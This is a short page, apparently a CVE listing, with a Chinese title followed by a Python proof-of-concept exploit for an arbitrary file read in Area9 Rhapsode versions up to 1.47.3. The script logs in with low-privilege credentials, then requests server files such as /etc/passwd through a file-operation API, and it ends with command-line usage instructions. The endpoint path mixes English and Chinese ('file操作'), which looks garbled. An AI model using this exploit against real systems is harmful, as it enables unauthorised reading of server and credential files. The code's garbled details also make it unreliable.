CVE-2025-67810 | Area9 Rhapsode 任意文件读取漏洞

import requests import sys # CVE-2025-67810 PoC - Area9 Rhapsode Arbitrary File Read # Author: Security Researcher # Target: Area9 Rhapsode <= 1.47.3 def exploit(target_url, username, password, file_to_read): """ Exploit arbitrary file read vulnerability in Area9 Rhapsode Args: target_url: Base URL of the vulnerable Area9 Rhapsode instance username: Valid user credentials (low privilege is sufficient) password: User password file_to_read: Path to file on the server to read (e.g., /etc/passwd) Returns: Content of the requested file """ # Step 1: Authenticate and obtain session token login_url = f"{target_url}/api/login" login_data = { "username": username, "password": password } session = requests.Session() try: login_response = session.post(login_url, json=login_data) if login_response.status_code != 200: print(f"[-] Authentication failed: {login_response.status_code}") return None print("[+] Successfully authenticated") except requests.RequestException as e: print(f"[-] Connection error: {e}") return None # Step 2: Exploit arbitrary file read via POST request exploit_url = f"{target_url}/api/file操作" exploit_data = { "operation": "read", "url": file_to_read, "filename": "output.txt" } try: exploit_response = session.post(exploit_url, json=exploit_data) if exploit_response.status_code == 200: print(f"[+] Successfully read file: {file_to_read}") return exploit_response.text else: print(f"[-] Exploit failed: {exploit_response.status_code}") return None except requests.RequestException as e: print(f"[-] Request error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve-2025-67810.py <target_url> <username> <password> <file_path>") print("Example: python cve-2025-67810.py https://rhapsode.example.com admin password /etc/passwd") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] file_path = sys.argv[4] result = exploit(target, user, pwd, file_path) if result: print("\n[File Content]:") print(result)